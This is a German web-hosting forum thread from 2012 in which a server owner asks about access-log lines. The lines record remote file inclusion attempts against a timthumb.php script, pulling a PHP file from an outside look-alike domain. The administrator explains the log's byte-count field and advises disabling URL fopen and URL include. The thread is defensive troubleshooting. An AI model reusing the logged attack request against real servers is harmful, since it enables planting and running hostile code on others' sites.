Deutsch| English
  #1  
Alt 20.01.2012, 21:03
Erfahrener Benutzer
 
Registriert seit: 19.10.2007
Beiträge: 200
Standard Remote File Inlusion - Angriffe von meinem Server

Hallo,

anscheinend wird über meinen Server ab und zu) seit wenigen Tagen (also seit gestern) ein Remote File Intrusion auf anderen Serverv versucht.

In den Logfiles finde ich:

web-ng:/var/log/httpd# grep taxo /var/log/httpd/ispconfig_access_log_2012_01_19
localhost||||1229||||78.46.75.84 - - [19/Jan/2012:23:18:41 +0100] "GET /?q=taxonomy/term/4//wp-content/themes/manifesto/scripts//timthumb.php%3fsrc=http://img.youtube.com.ericharland.net/bogel.php HTTP/1.1" 200 1229 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"

localhost||||1229||||78.46.75.84 - - [19/Jan/2012:23:18:43 +0100] "GET /?q=taxonomy/term//wp-content/themes/manifesto/scripts//timthumb.php%3fsrc=http://img.youtube.com.ericharland.net/bogel.php HTTP/1.1" 200 1229 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)"

Ich benutze ISPConfig 2 (daher der Pfad zu der Logdatei)

Kann mir jemand erklären wie ich:

localhost||||1229||||78.46.75.84

deuten muss

also localhost scheint klar - dahinter die IP Adresse meines Servers
Aber die Zahl dazwischen kann ich nicht zuordnen!
Mit Zitat antworten
  #2  
Alt 23.01.2012, 09:00
Administrator
 
Registriert seit: 08.08.2007
Beiträge: 8.817
Standard

Zitat:
anscheinend wird über meinen Server ab und zu) seit wenigen Tagen (also seit gestern) ein Remote File Intrusion auf anderen Serverv versucht.
Schau mal in die php.ini Datei, es sollte URL Fopen und URL Include ausgeschaltet sein.

Zitat:
Aber die Zahl dazwischen kann ich nicht zuordnen!
Das ist die Größe der heruntergeladenen Daten in Bytes und wird zur Erstellung der Trafficstatistik verwendet.
Mit Zitat antworten
  #3  
Alt 23.01.2012, 11:23
Erfahrener Benutzer
 
Registriert seit: 19.10.2007
Beiträge: 200
Standard

Allow_url_fopen hab ich auf off (das hatte ich beim googlen gefunden)
aber include muss ich nachher schauen (das war mir nicht bekannt)

DANKE
Mit Zitat antworten
Antwort


Themen-Optionen
Ansicht

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks are an
Pingbacks are an
Refbacks are an



Alle Zeitangaben in WEZ +2. Es ist jetzt 12:24 Uhr.


Powered by vBulletin® Version 3.8.1 (Deutsch)
Copyright ©2000 - 2012, Jelsoft Enterprises Ltd.
Search Engine Friendly URLs by vBSEO 3.6.0